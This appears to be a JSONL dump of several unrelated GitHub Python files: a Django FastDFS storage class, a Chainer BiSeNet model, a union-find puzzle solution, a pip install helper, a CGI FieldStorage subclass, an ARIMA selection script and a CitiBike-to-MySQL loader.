{"seq_id":"7031087852","text":"from django.core.files.storage import Storage\nfrom django.conf import settings\nfrom fdfs_client.client import Fdfs_client\n\nclass FDFSStorage(Storage):\n    '''FastDFS file storage class'''\n    def __init__(self, client_conf=None, base_url=None):\n        if client_conf is None:\n            self.client_conf = settings.FASTDFS_CLIENT_CONF\n        else:\n            self.client_conf = client_conf\n\n        if base_url is None:\n            self.base_url = settings.DAST_URL\n        else:\n            self.base_url = base_url\n\n    def _open(self, name, mode='rb'):\n        pass\n\n    def _save(self, name, content):\n        '''called by Django when saving a file'''\n        client = Fdfs_client(self.client_conf)\n        ret = client.upload_by_buffer(content.read())\n        '''return dict {\n            'Group name' : group_name,\n            'Remote file_id' : remote_file_id,\n            'Status' : 
'Upload successed.',\n            'Local file name' : '',\n            'Uploaded size' : upload_size,\n            'Storage IP' : storage_ip\n        } if success else None'''\n        if ret.get('Status') != 'Upload successed.':\n            raise Exception('failed to upload the file to FastDFS')\n        filename = ret.get('Remote file_id')\n        return filename\n\n    def exists(self, name):\n        '''used by Django to check whether the file name is available'''\n        return False\n\n    def url(self, name):\n        return self.base_url + name","repo_name":"abctan/django_everyfresh","sub_path":"utils/fdfs/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18675527566","text":"\"\"\"\n    BiSeNet for CelebAMask-HQ, implemented in Chainer.\n    Original paper: 'BiSeNet: Bilateral Segmentation Network for Real-time Semantic Segmentation,'\n    https://arxiv.org/abs/1808.00897.\n\"\"\"\n\n__all__ = ['BiSeNet', 'bisenet_resnet18_celebamaskhq']\n\nimport os\nimport chainer.functions as F\nfrom chainer import Chain\nfrom chainer.serializers import load_npz\nfrom .common import conv1x1, conv1x1_block, conv3x3_block, InterpolationBlock, MultiOutputSequential\nfrom .resnet import resnet18\n\n\nclass PyramidPoolingZeroBranch(Chain):\n    \"\"\"\n    Pyramid pooling zero branch.\n\n    Parameters:\n    ----------\n    in_channels : int\n        Number of input channels.\n    out_channels : int\n        Number of output channels.\n    in_size : tuple of 2 int\n        Spatial size of output image for the upsampling operation.\n    \"\"\"\n    def __init__(self,\n                 in_channels,\n                 out_channels,\n                 in_size):\n        super(PyramidPoolingZeroBranch, self).__init__()\n        self.in_size = in_size\n\n        with self.init_scope():\n            self.conv = conv1x1_block(\n                in_channels=in_channels,\n                out_channels=out_channels)\n            self.up = InterpolationBlock(\n                scale_factor=None,\n                mode=\"nearest\")\n\n    def __call__(self, x):\n        in_size = self.in_size if self.in_size is not None else x.shape[2:]\n        x = F.average_pooling_2d(x, ksize=x.shape[2:])\n        x = self.conv(x)\n        x = self.up(x, size=in_size)\n        return x\n\n\nclass AttentionRefinementBlock(Chain):\n    \"\"\"\n    Attention refinement block.\n\n    Parameters:\n    ----------\n    in_channels : int\n        Number of input channels.\n    out_channels : int\n        Number of output channels.\n    \"\"\"\n    def __init__(self,\n                 in_channels,\n                 out_channels):\n        super(AttentionRefinementBlock, self).__init__()\n        with self.init_scope():\n            self.conv1 = conv3x3_block(\n                in_channels=in_channels,\n                out_channels=out_channels)\n            self.conv2 = conv1x1_block(\n                in_channels=out_channels,\n                out_channels=out_channels,\n                activation=(lambda: F.sigmoid))\n\n    def __call__(self, x):\n        x = self.conv1(x)\n        w = F.average_pooling_2d(x, ksize=x.shape[2:])\n        w = self.conv2(w)\n        x = x * w\n        return x\n\n\nclass PyramidPoolingMainBranch(Chain):\n    \"\"\"\n    Pyramid pooling main branch.\n\n    Parameters:\n    ----------\n    in_channels : int\n        Number of input channels.\n    out_channels : int\n        Number of output channels.\n    scale_factor : float\n        Multiplier for spatial size.\n    \"\"\"\n    def __init__(self,\n                 in_channels,\n                 out_channels,\n                 scale_factor):\n        super(PyramidPoolingMainBranch, self).__init__()\n        with self.init_scope():\n            self.att = AttentionRefinementBlock(\n                in_channels=in_channels,\n                out_channels=out_channels)\n            self.up = InterpolationBlock(\n                scale_factor=scale_factor,\n                mode=\"nearest\")\n            self.conv = conv3x3_block(\n                in_channels=out_channels,\n                out_channels=out_channels)\n\n    def __call__(self, x, y):\n        x = self.att(x)\n        x = x + y\n        x = self.up(x)\n        x = self.conv(x)\n        return x\n\n\nclass FeatureFusion(Chain):\n    \"\"\"\n    
Feature fusion block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n reduction : int, default 4\n Squeeze reduction value.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n reduction=4):\n super(FeatureFusion, self).__init__()\n mid_channels = out_channels // reduction\n\n with self.init_scope():\n self.conv_merge = conv1x1_block(\n in_channels=in_channels,\n out_channels=out_channels)\n self.conv1 = conv1x1(\n in_channels=out_channels,\n out_channels=mid_channels)\n self.activ = F.relu\n self.conv2 = conv1x1(\n in_channels=mid_channels,\n out_channels=out_channels)\n self.sigmoid = F.sigmoid\n\n def __call__(self, x, y):\n x = F.concat((x, y), axis=1)\n x = self.conv_merge(x)\n w = F.average_pooling_2d(x, ksize=x.shape[2:])\n w = self.conv1(w)\n w = self.activ(w)\n w = self.conv2(w)\n w = self.sigmoid(w)\n x_att = x * w\n x = x + x_att\n return x\n\n\nclass PyramidPooling(Chain):\n \"\"\"\n Pyramid Pooling module.\n\n Parameters:\n ----------\n x16_in_channels : int\n Number of input channels for x16.\n x32_in_channels : int\n Number of input channels for x32.\n y_out_channels : int\n Number of output channels for y-outputs.\n y32_out_size : tuple of 2 int\n Spatial size of the y32 tensor.\n \"\"\"\n def __init__(self,\n x16_in_channels,\n x32_in_channels,\n y_out_channels,\n y32_out_size):\n super(PyramidPooling, self).__init__()\n z_out_channels = 2 * y_out_channels\n\n with self.init_scope():\n self.pool32 = PyramidPoolingZeroBranch(\n in_channels=x32_in_channels,\n out_channels=y_out_channels,\n in_size=y32_out_size)\n self.pool16 = PyramidPoolingMainBranch(\n in_channels=x32_in_channels,\n out_channels=y_out_channels,\n scale_factor=2)\n self.pool8 = PyramidPoolingMainBranch(\n in_channels=x16_in_channels,\n out_channels=y_out_channels,\n scale_factor=2)\n self.fusion = FeatureFusion(\n in_channels=z_out_channels,\n out_channels=z_out_channels)\n\n def __call__(self, x8, x16, x32):\n y32 = self.pool32(x32)\n y16 = self.pool16(x32, y32)\n y8 = self.pool8(x16, y16)\n z8 = self.fusion(x8, y8)\n return z8, y8, y16\n\n\nclass BiSeHead(Chain):\n \"\"\"\n BiSeNet head (final) block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n mid_channels : int\n Number of middle channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n def __init__(self,\n in_channels,\n mid_channels,\n out_channels):\n super(BiSeHead, self).__init__()\n with self.init_scope():\n self.conv1 = conv3x3_block(\n in_channels=in_channels,\n out_channels=mid_channels)\n self.conv2 = conv1x1(\n in_channels=mid_channels,\n out_channels=out_channels)\n\n def __call__(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass BiSeNet(Chain):\n \"\"\"\n BiSeNet model from 'BiSeNet: Bilateral Segmentation Network for Real-time Semantic Segmentation,'\n https://arxiv.org/abs/1808.00897.\n\n Parameters:\n ----------\n backbone : func -> nn.Sequential\n Feature extractor.\n aux : bool, default True\n Whether to output an auxiliary results.\n fixed_size : bool, default True\n Whether to expect fixed spatial size of input image.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (640, 480)\n Spatial size of the expected input image.\n classes : int, default 1000\n Number of classification classes.\n \"\"\"\n def __init__(self,\n backbone,\n aux=True,\n fixed_size=True,\n in_channels=3,\n in_size=(640, 480),\n classes=19):\n super(BiSeNet, 
self).__init__()\n assert (in_channels == 3)\n self.in_size = in_size\n self.classes = classes\n self.aux = aux\n self.fixed_size = fixed_size\n\n with self.init_scope():\n self.backbone, backbone_out_channels = backbone()\n\n y_out_channels = backbone_out_channels[0]\n z_out_channels = 2 * y_out_channels\n y32_out_size = (self.in_size[0] // 32, self.in_size[1] // 32) if fixed_size else None\n self.pool = PyramidPooling(\n x16_in_channels=backbone_out_channels[1],\n x32_in_channels=backbone_out_channels[2],\n y_out_channels=y_out_channels,\n y32_out_size=y32_out_size)\n self.head_z8 = BiSeHead(\n in_channels=z_out_channels,\n mid_channels=z_out_channels,\n out_channels=classes)\n self.up8 = InterpolationBlock(scale_factor=(8 if fixed_size else None))\n\n if self.aux:\n mid_channels = y_out_channels // 2\n self.head_y8 = BiSeHead(\n in_channels=y_out_channels,\n mid_channels=mid_channels,\n out_channels=classes)\n self.head_y16 = BiSeHead(\n in_channels=y_out_channels,\n mid_channels=mid_channels,\n out_channels=classes)\n self.up16 = InterpolationBlock(scale_factor=(16 if fixed_size else None))\n\n def __call__(self, x):\n assert (x.shape[2] % 32 == 0) and (x.shape[3] % 32 == 0)\n\n x8, x16, x32 = self.backbone(x)\n z8, y8, y16 = self.pool(x8, x16, x32)\n\n z8 = self.head_z8(z8)\n z8 = self.up8(z8)\n\n if self.aux:\n y8 = self.head_y8(y8)\n y16 = self.head_y16(y16)\n y8 = self.up8(y8)\n y16 = self.up16(y16)\n return z8, y8, y16\n else:\n return z8\n\n\ndef get_bisenet(model_name=None,\n pretrained=False,\n root=os.path.join(\"~\", \".chainer\", \"models\"),\n **kwargs):\n \"\"\"\n Create BiSeNet model with specific parameters.\n\n Parameters:\n ----------\n model_name : str or None, default None\n Model name for loading pretrained model.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.chainer/models'\n Location for keeping the model parameters.\n \"\"\"\n net = BiSeNet(\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import get_model_file\n load_npz(\n file=get_model_file(\n model_name=model_name,\n local_model_store_dir_path=root),\n obj=net)\n\n return net\n\n\ndef bisenet_resnet18_celebamaskhq(pretrained_backbone=False, classes=19, **kwargs):\n \"\"\"\n BiSeNet model on the base of ResNet-18 for face segmentation on CelebAMask-HQ from 'BiSeNet: Bilateral Segmentation\n Network for Real-time Semantic Segmentation,' https://arxiv.org/abs/1808.00897.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n classes : int, default 19\n Number of classes.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.chainer/models'\n Location for keeping the model parameters.\n \"\"\"\n def backbone():\n features_raw = resnet18(pretrained=pretrained_backbone).features\n del features_raw.final_pool\n features = MultiOutputSequential(return_last=False)\n with features.init_scope():\n setattr(features, \"init_block\", features_raw.el(0))\n for i, block_name in enumerate(features_raw.layer_names[1:]):\n stage = features_raw[block_name]\n if i != 0:\n stage.do_output = True\n setattr(features, \"stage{}\".format(i + 1), stage)\n out_channels = [128, 256, 512]\n return features, out_channels\n return get_bisenet(backbone=backbone, classes=classes, 
model_name=\"bisenet_resnet18_celebamaskhq\", **kwargs)\n\n\ndef _test():\n import numpy as np\n import chainer\n\n chainer.global_config.train = False\n\n in_size = (640, 480)\n aux = True\n pretrained = False\n\n models = [\n bisenet_resnet18_celebamaskhq,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained, in_size=in_size, aux=aux)\n weight_count = net.count_params()\n print(\"m={}, {}\".format(model.__name__, weight_count))\n if aux:\n assert (model != bisenet_resnet18_celebamaskhq or weight_count == 13300416)\n else:\n assert (model != bisenet_resnet18_celebamaskhq or weight_count == 13150272)\n\n batch = 1\n x = np.random.rand(batch, 3, in_size[0], in_size[1]).astype(np.float32)\n ys = net(x)\n y = ys[0] if aux else ys\n assert (y.shape == (batch, 19, in_size[0], in_size[1]))\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"osmr/imgclsmob","sub_path":"chainer_/chainercv2/models/bisenet.py","file_name":"bisenet.py","file_ext":"py","file_size_in_byte":13212,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"26613809033","text":"def find(x):\n if par[x] < 0:\n return x\n\n par[x] = find(par[x])\n return par[x]\n\n\ndef union(x, y):\n x = find(x)\n y = find(y)\n if x == y:\n return\n\n if par[x] > par[y]:\n x, y = y, x\n\n par[x] += par[y]\n par[y] = x\n\n\ndef same(x, y):\n return find(x) == find(y)\n\n\nn = int(input())\nnames = set()\nS, T = [], []\nfor _ in range(n):\n s, t = input().split()\n S.append(s)\n T.append(t)\n names.add(s)\n names.add(t)\n\nstr2num: dict = {}\nnum2str: dict = {}\n\nfor i, name in enumerate(names):\n str2num[name] = i\n num2str[i] = name\n\npar = [-1] * len(names)\n\n\nfor s, t in zip(S, T):\n ss = str2num[s]\n tt = str2num[t]\n if same(ss, tt):\n print(\"No\")\n exit()\n union(ss, tt)\nprint(\"Yes\")\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-285/D_Union.py","file_name":"D_Union.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21446257222","text":"\"\"\"\nfind node ids of players that have recently played\n\"\"\"\n\nfrom parse_tools import parse_line, format_name\n\ndef find_recent_ids(nodes, year_thresh, roster_file_name):\n \"\"\"\n loop through roster file and check players\n against thresh. 
return ids of new players from nodes\n    \"\"\"\n    recent_players = set()\n\n    with open(roster_file_name) as file_in:\n        for line in file_in:\n            player, _, _, year = parse_line(line)\n\n            if int(year) >= year_thresh:\n                recent_players.add(format_name(player))\n\n    recent_ids = []\n    for node_id, name in nodes.items():\n        if name in recent_players:\n            recent_ids.append(node_id)\n    return recent_ids\n\nif __name__ == \"__main__\":\n    node_file_name = '../data/player_graph/nodes.csv'\n    roster_file_name = '../data/roster_data.tsv'\n\n    year_thresh = 2013\n\n    output_file_name = '../data/player_graph/node_ids_since_'\n    output_file_name += str(year_thresh)\n    output_file_name += '.txt'\n\n    # read nodes\n    nodes = {}\n    with open(node_file_name, 'r') as file_in:\n        next(file_in) # skip header row\n        for line in file_in:\n            player_id, label = line.strip().split(',')\n            nodes[int(player_id)] = label\n\n    recent_ids = find_recent_ids(nodes, int(year_thresh),\n                                 roster_file_name)\n\n    with open(output_file_name, 'w') as file_out:\n        for rid in recent_ids:\n            print(rid, file=file_out)\n","repo_name":"kevinsprong23/buda-graph","sub_path":"create/find_recent_players.py","file_name":"find_recent_players.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"24651924939","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport pkg_resources\nfrom ephemeral import shell\nfrom ephemeral.shell import cout\n\ndef pip_install(context, package, extra_args=None):\n    try:\n        pkg_resources.get_distribution(package)\n    except pkg_resources.DistributionNotFound:\n        cout('Installing dependency [{}]'.format(package))\n        if context.vars.config and package + '.source' in context.vars.config.__dict__:\n            package_source = context.vars.config.__dict__[package + '.source']\n            cout('Installing the package from [{}]'.format(package_source))\n            run_attributes = [context.config.pip_path, 'install', '-I', '--verbose', '-e', package_source]\n            #run_attributes = [context.config.pip_path, 'install', '-I', '--verbose', package, '--no-index', '--find-links', package_source]\n        else:\n            run_attributes = [context.config.pip_path, 'install', '-I', '--verbose', package]\n        if extra_args:\n            run_attributes = run_attributes + extra_args.split(' ')\n        shell.brun(' '.join(run_attributes))\n\n","repo_name":"GonzaloAlvarez/ephemeral","sub_path":"ephemeral/bootstrap/pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"33911918908","text":"\"\"\"FieldStorage.py\n\nThis module defines a subclass of the standard Python cgi.FieldStorage class\nwith an extra method that will allow a FieldStorage to parse a query string\neven in a POST request.\n\"\"\"\n\nimport cgi\nimport os\nimport urllib\n\n\nclass FieldStorage(cgi.FieldStorage):\n    \"\"\"Modified FieldStorage class for POST requests with query strings.\n\n    Parameters in the query string which have not been sent via POST are\n    appended to the field list. This is different from the behavior of\n    Python versions before 2.6 which completely ignored the query string in\n    POST request, but it's also different from the behavior of the later Python\n    versions which append values from the query string to values sent via POST\n    for parameters with the same name. 
In other words, our FieldStorage class\n    overrides the query string parameters with the parameters sent via POST.\n\n    As recommended by W3C in section B.2.2 of the HTML 4.01 specification,\n    we also support use of ';' in place of '&' as separator in query strings.\n    \"\"\"\n\n    def __init__(self, fp=None, headers=None, outerboundary='',\n            environ=os.environ, keep_blank_values=False, strict_parsing=False):\n        method = environ.get('REQUEST_METHOD', 'GET').upper()\n        qs_on_post = (environ.get('QUERY_STRING', None)\n            if method not in ('GET', 'HEAD') else None)\n        if qs_on_post:\n            environ['QUERY_STRING'] = ''\n        try:\n            cgi.FieldStorage.__init__(self, fp, headers, outerboundary,\n                environ, keep_blank_values, strict_parsing)\n        finally:\n            if qs_on_post:\n                environ['QUERY_STRING'] = qs_on_post\n        if qs_on_post:\n            self.add_qs(qs_on_post)\n\n    def add_qs(self, qs):\n        \"\"\"Add all non-existing parameters from the given query string.\"\"\"\n        r = {}\n        for name_value in qs.split('&'):\n            for name_value in name_value.split(';'):\n                nv = name_value.split('=', 1) # maxsplit=1, so the value itself may contain '='\n                if len(nv) != 2:\n                    if self.strict_parsing:\n                        raise ValueError('bad query field: %r' % (name_value,))\n                    continue\n                name = urllib.unquote(nv[0].replace('+', ' '))\n                value = urllib.unquote(nv[1].replace('+', ' '))\n                if len(value) or self.keep_blank_values:\n                    if name in r:\n                        r[name].append(value)\n                    else:\n                        r[name] = [value]\n        if self.list is None:\n            # This makes sure self.keys() are available, even\n            # when valid POST data wasn't encountered.\n            self.list = []\n        for key in r:\n            if key not in self:\n                # Only append values that aren't already the FieldStorage;\n                # this makes POSTed vars override vars on the query string.\n                for value in r[key]:\n                    self.list.append(cgi.MiniFieldStorage(key, value))\n","repo_name":"feitianyiren/w4py","sub_path":"WebUtils/FieldStorage.py","file_name":"FieldStorage.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"40257682770","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\nAUTHOR: WANG BAO RUI\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\nimport sys\r\nimport os\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# TSA from Statsmodels\r\nimport statsmodels.api as sm\r\nimport statsmodels.formula.api as smf\r\nimport statsmodels.tsa.api as smt\r\n\r\n# Display and Plotting\r\nimport matplotlib.pylab as plt\r\nimport seaborn as sns\r\n\r\npd.set_option('display.float_format', lambda x: '%.5f' % x) # pandas\r\nnp.set_printoptions(precision=5, suppress=True) # numpy\r\n\r\npd.set_option('display.max_columns', 100)\r\npd.set_option('display.max_rows', 100)\r\nsns.set(style='ticks', context='poster')\r\n \r\n\r\nos.chdir(\"D://机器学习课程//代码//Python时间序列/\")\r\nfilename_ts = 'train_1.csv'\r\nts_df = pd.read_csv(filename_ts,index_col=0,parse_dates=[0])\r\nn_sample = ts_df.shape[0]\r\n\r\n##split the data\r\nn_train=int(0.95*n_sample)+1\r\nn_forecast = n_sample - n_train\r\nts_train = ts_df.iloc[0:n_train]['value']\r\nts_test = ts_df.iloc[n_train:]['value']\r\n\r\ndef tsplot(y, lags=None, title='', figsize=(14, 8)):\r\n    \r\n    fig = plt.figure(figsize=figsize)\r\n    layout = (2, 2)\r\n    ts_ax = plt.subplot2grid(layout, (0, 0))\r\n    hist_ax = plt.subplot2grid(layout, (0, 1))\r\n    acf_ax = plt.subplot2grid(layout, (1, 0))\r\n    pacf_ax = plt.subplot2grid(layout, (1, 1))\r\n    \r\n    y.plot(ax=ts_ax)\r\n    ts_ax.set_title(title)\r\n    y.plot(ax=hist_ax, kind='hist', 
bins=25)\r\n hist_ax.set_title('Histogram')\r\n smt.graphics.plot_acf(y, lags=lags, ax=acf_ax)\r\n smt.graphics.plot_pacf(y, lags=lags, ax=pacf_ax)\r\n [ax.set_xlim(0) for ax in [acf_ax, pacf_ax]]\r\n sns.despine()\r\n fig.tight_layout()\r\n return ts_ax, acf_ax, pacf_ax\r\n \r\n \r\n \r\n#Model Estimation\r\n\r\n# Fit the model\r\narima200 = sm.tsa.SARIMAX(ts_train, order=(2,0,0))\r\nmodel_results = arima200.fit()\r\n\r\n#model estimation\r\n\r\nimport itertools\r\n\r\np_min = 0\r\nd_min = 0\r\nq_min = 0\r\np_max = 4\r\nd_max = 0\r\nq_max = 4\r\n\r\n# Initialize a DataFrame to store the results\r\nresults_bic = pd.DataFrame(index=['AR{}'.format(i) for i in range(p_min,p_max+1)],\r\n columns=['MA{}'.format(i) for i in range(q_min,q_max+1)])\r\n\r\nfor p,d,q in itertools.product(range(p_min,p_max+1),\r\n range(d_min,d_max+1),\r\n range(q_min,q_max+1)):\r\n if p==0 and d==0 and q==0:\r\n results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = np.nan\r\n continue\r\n \r\n try:\r\n model = sm.tsa.SARIMAX(ts_train, order=(p, d, q),\r\n #enforce_stationarity=False,\r\n #enforce_invertibility=False,\r\n )\r\n results = model.fit()\r\n results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = results.bic\r\n except:\r\n continue\r\nresults_bic = results_bic[results_bic.columns].astype(float)\r\n\r\nfig, ax = plt.subplots(figsize=(10, 8))\r\nax = sns.heatmap(results_bic,\r\n mask=results_bic.isnull(),\r\n ax=ax,\r\n annot=True,\r\n fmt='.2f',\r\n );\r\nax.set_title('BIC');\r\n\r\n \r\n\r\ntrain_results = sm.tsa.arma_order_select_ic(ts_train, ic=['aic', 'bic'], trend='nc', max_ar=4, max_ma=4)\r\n\r\nprint('AIC', train_results.aic_min_order)\r\nprint('BIC', train_results.bic_min_order)\r\n\r\n\r\n##Check the model's distribution\r\nmodel_results.plot_diagnostics(figsize=(16, 12));\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"wangshenfeng/ML","sub_path":"ARISM/ARISM model.py","file_name":"ARISM model.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40985351989","text":"\nimport math\n\ndef calc_slope_between(first_asteroid, second_asteroid):\n delta_x = second_asteroid[0] - first_asteroid[0]\n delta_y = second_asteroid[1] - first_asteroid[1]\n\n if delta_x == 0:\n slope_x = 0\n slope_y = delta_y // abs(delta_y)\n elif delta_y == 0:\n slope_x = delta_x // abs(delta_x)\n slope_y = 0\n else:\n gcd_val = gcd(abs(delta_x), abs(delta_y))\n slope_x = delta_x // gcd_val\n slope_y = delta_y // gcd_val\n \n return (slope_x, slope_y)\n\ndef count_asteroids_between(asteroid_list, first_asteroid, second_asteroid):\n slope_x, slope_y = calc_slope_between(first_asteroid, second_asteroid)\n \n step_asteroid = (first_asteroid[0] + slope_x, first_asteroid[1] + slope_y)\n asteroid_count = 0\n \n while step_asteroid != second_asteroid:\n if tuple(step_asteroid) in asteroid_list:\n asteroid_count += 1\n\n step_asteroid = (step_asteroid[0] + slope_x, step_asteroid[1] + slope_y)\n \n return asteroid_count\n\ndef asteroid_visible(asteroid_list, first_asteroid, second_asteroid):\n return count_asteroids_between(asteroid_list, first_asteroid, second_asteroid) == 0\n\ndef calc_angle_between(asteroid_list, first_asteroid, second_asteroid):\n\n slope_x, slope_y = calc_slope_between(first_asteroid, second_asteroid)\n\n asteroids_between = count_asteroids_between(asteroid_list, first_asteroid, second_asteroid)\n\n hypoteneuse = math.sqrt(float(slope_x ** 2 + slope_y ** 2))\n divisor = abs(float(slope_x)) / hypoteneuse\n\n 
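# Quadrant sanity checks for the mapping below: slope (0,-1) -> 0 (straight up),\n    # (1,0) -> pi/2, (0,1) -> pi, (-1,0) -> 3*pi/2; every closer asteroid on the same\n    # line of sight pushes the angle out by a further full turn of 2*pi.\n    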
# Note: straight up is the zero angle. For this scenario, slope_y will be negative.\n # This means that the slope_y comparisons will be the opposite of expected.\n if slope_x == 0:\n if slope_y < 0:\n final_angle = 0\n else:\n final_angle = math.pi\n elif slope_y == 0:\n if slope_x < 0:\n final_angle = math.pi * 3 / 2\n else:\n final_angle = math.pi / 2\n elif slope_x > 0 and slope_y < 0:\n final_angle = math.asin(divisor)\n elif slope_x > 0 and slope_y > 0:\n final_angle = math.acos(divisor) + math.pi / 2\n elif slope_x < 0 and slope_y > 0:\n final_angle = math.asin(divisor) + math.pi\n elif slope_x < 0 and slope_y < 0:\n final_angle = math.acos(divisor) + math.pi * 3 / 2\n\n final_angle += asteroids_between * 2 * math.pi\n\n return final_angle\n\ndef gcd(a, b):\n\n if b > a:\n return gcd(b, a)\n if b == 0:\n return a\n \n return gcd(b, a % b)\n\n\ninput_file = 'adventofcode2019/10_MonitorStation.txt'\n\nif __name__ == \"__main__\":\n\n file_obj = open(input_file, 'r')\n\n asteroid_list = {}\n\n for line_no, line in enumerate(file_obj.readlines()):\n line = line.strip()\n\n for i, x in enumerate(line):\n if x == \"#\":\n asteroid_list[(i, line_no)] = 0\n \n iter_asteroids = list(asteroid_list.keys())\n\n for ind, fir_ast in enumerate(iter_asteroids[0:-1]):\n for sec_ast in iter_asteroids[ind+1:]:\n\n if asteroid_visible(asteroid_list, fir_ast, sec_ast):\n asteroid_list[fir_ast] += 1\n asteroid_list[sec_ast] += 1\n \n max_ast = max(asteroid_list, key=lambda x: asteroid_list[x])\n\n print(\"Part 1 Result:\")\n print(max_ast)\n print(asteroid_list[max_ast])\n\n print(\"Part 2 Result\")\n \n angle_dict = {}\n\n for ast in iter_asteroids:\n if ast != max_ast:\n rotate_angle = calc_angle_between(asteroid_list, max_ast, ast)\n else:\n rotate_angle = -1\n\n angle_dict[ast] = rotate_angle\n\n angle_sorted = list(sorted(iter_asteroids, key=lambda x: angle_dict[x]))\n\n target_asteroid = angle_sorted[200]\n\n #print(target_asteroid)\n #print(angle_dict[target_asteroid])\n\n for i, x in enumerate(angle_sorted[1:]):\n print(i+1, x)\n","repo_name":"idoerr/challenges","sub_path":"adventofcode2019/10_MonitorStation.py","file_name":"10_MonitorStation.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12763351420","text":"'''\n@Author: Senkita\n'''\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom datetime import datetime\nfrom sqlalchemy.types import NVARCHAR, Float, Integer\nimport pymysql\nimport sqlalchemy\nimport os\n\ndef resave(file_dir,year,month):\n titles = ['tripduration',\n 'starttime',\n 'stoptime',\n 'start station id',\n 'start station name',\n 'start station latitude',\n 'start station longitude',\n 'end station id',\n 'end station name',\n 'end station latitude',\n 'end station longitude',\n 'bikeid',\n 'usertype',\n 'birth year',\n 'gender']\n old_file = pd.read_csv(os.path.join(file_dir,'{:0>4d}-{:0>2d}.csv'.format(year,month)),\n encoding='gbk',\n names=titles,\n parse_dates=['starttime','stoptime','birth year'],\n low_memory=False)\n if os.path.exists(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month))):\n os.remove(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)))\n old_file[1:].to_csv(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)))\n os.remove(os.path.join(file_dir,'{:0>4d}-{:0>2d}.csv'.format(year,month)))\n new_file = pd.read_csv(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)),\n encoding='gbk',\n 
parse_dates=['starttime','stoptime','birth year'],\n                           low_memory=False)\n    new_file.drop(columns='Unnamed: 0',inplace=True)\n    return new_file\ndef map_types(df):\n    dtypedict = {}\n    for i,j in zip(df.columns,df.dtypes):\n        if 'object' in str(j):\n            dtypedict.update({i:NVARCHAR(length=255)})\n        if 'float' in str(j):\n            dtypedict.update({i:Float(precision=2,asdecimal=True)})\n        if 'int' in str(j):\n            dtypedict.update({i:Integer})\n    return dtypedict\ndef create_connection():\n    config = dict(host='hostname',\n                  user='username',\n                  passwd='password',\n                  cursorclass=pymysql.cursors.DictCursor)\n    conn = pymysql.Connect(**config)\n    conn.autocommit(1)\n    cursor = conn.cursor()\n    cursor.execute('create database if not exists data')\n    cursor.close()\n    conn.close()\n    engine = create_engine('mysql+pymysql://username:password@hostname:3306/data')\n    return engine.connect()\ndef main(year,month):\n    file_dir = os.path.join(os.getcwd(),'data/')\n    df = resave(file_dir,year,month)\n    conn = create_connection()\n    dtypedict = map_types(df)\n    df.to_sql(name='{:0>4d}{:0>2d}'.format(year,month),\n              con=conn,\n              if_exists='replace',\n              index=False,\n              dtype=dtypedict)\n    os.remove(os.path.join(file_dir,'{:0>4d}{:0>2d}.csv'.format(year,month)))\nif __name__ == '__main__':\n    for year in range(2013,2020):\n        if year == 2013:\n            for month in range(6,13):\n                main(year,month)\n        elif year == 2019:\n            for month in range(1,3): # calendar months are 1-based; adjust the upper bound to the months actually published\n                main(year,month)\n        else:\n            for month in range(1,13):\n                main(year,month)","repo_name":"DeerChen/PracticeProject","sub_path":"CitiBike/DataCollection/SaveCitiBikeData.py","file_name":"SaveCitiBikeData.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
